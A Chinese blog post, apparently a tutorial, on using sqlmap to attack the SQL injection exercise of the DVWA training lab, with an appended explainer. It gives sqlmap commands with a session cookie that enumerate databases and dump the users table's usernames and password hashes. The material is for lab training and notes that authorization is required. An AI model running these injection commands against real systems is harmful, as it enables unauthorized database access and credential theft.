sqlmap的使用(基于dvwa的靶场实验)

本文详细介绍如何使用SQLMap工具对不同安全级别的DVWA靶场进行SQL注入攻击,包括Low、Medium、High及Impossible级别,并演示了如何获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这是一次基于DVWA靶场下sql injection的对sqlmap的测试

low等级

先输入一个1进去查看反应

 

发现还是有反应的,并且url中也有体现,直接输入命令

sqlmap -u " //测试的网址url// "

 在sqlmap跑的过程中会有一些需要选择的地方,直接无脑选y回车就行

从这里可以看到存在注入点

开始注入

sqlmap -u " //测试的网址url// " --dbs

 

爆出数据库名

继续

sqlmap -u " //测试的网址url// " -D dvwa --tables

&n

### DVWA靶场使用sqlmap进行SQL注入测试 DVWA(Damn Vulnerable Web Application)是一个专门用于安全测试和学习的脆弱Web应用,它提供了多个漏洞场景,包括SQL注入。通过sqlmap工具可以对DVWA靶场进行自动化SQL注入测试,从而快速发现和利用SQL注入漏洞。 #### 基本步骤 1. **设置DVWA环境** DVWA数据库配置通常如下: ```php $_DVWA[ 'db_server' ] = '127.0.0.1'; // 数据库地址 $_DVWA[ 'db_database' ] = 'dvwa'; // 数据库名称 $_DVWA[ 'db_user' ] = 'root'; // 数据库用户名 $_DVWA[ 'db_password' ] = 'root'; // 数据库密码 ``` 确保数据库服务正常运行,并且DVWA的配置文件指向正确的数据库信息[^4]。 2. **启动DVWA并登录** 在浏览器中访问DVWA的登录页面,默认用户名为`admin`,密码为`password`。登录后,将安全级别设置为`low`或`medium`,以便更容易进行SQL注入测试。 3. **获取Cookie信息** 在使用sqlmap进行测试时,需要提供会话Cookie以保持登录状态。可以通过浏览器的开发者工具查看当前会话的Cookie信息,例如: ``` security=low; PHPSESSID=nntokg4euk42c5cemkh41et470 ``` 4. **运行sqlmap命令** 使用sqlmapDVWASQL注入点进行测试时,可以使用如下命令: ```bash sqlmap.py -u "http://192.168.199.16/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nntokg4euk42c5cemkh41et470; security=low" --data "id=1&Submit=Submit" ``` 这条命令指定了目标URL、Cookie以及POST求中的数据内容[^2]。 5. **探测数据库信息** 如果确认存在SQL注入漏洞,可以进一步探测数据库信息。例如,获取数据库名称、表名和列名: ```bash sqlmap -u "http://192.168.199.16/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nntokg4euk42c5cemkh41et470; security=low" --dbs ``` 6. **获取指定表和列的数据** 在确定数据库名称后,可以获取特定表和列的数据。例如,获取`dvwa`数据库中`users`表的`user`和`password`列: ```bash sqlmap -u "http://192.168.199.16/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=nntokg4euk42c5cemkh41et470; security=low" -D dvwa -T users -C user,password --dump ``` 这条命令会将`users`表中的`user`和`password`列的数据导出[^3]。 #### 注意事项 - **安全级别设置** DVWA提供了不同的安全级别lowmediumhigh),不同级别的SQL注入漏洞防护机制不同。建议从`low`级别开始测试,逐步提高难度。 - **Cookie的有效性** 在使用sqlmap时,确保提供的Cookie信息是有效的,否则可能导致求失败。 - **避免过度扫描** 在高安全级别下,DVWA可能会记录多次错误求并阻止进一步的访问。因此,建议合理设置sqlmap的扫描参数,避免频繁触发安全机制。 - **合法性和道德规范** SQL注入测试应在合法授权的范围内进行,未经授权对系统进行攻击是违法行为。 ####
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值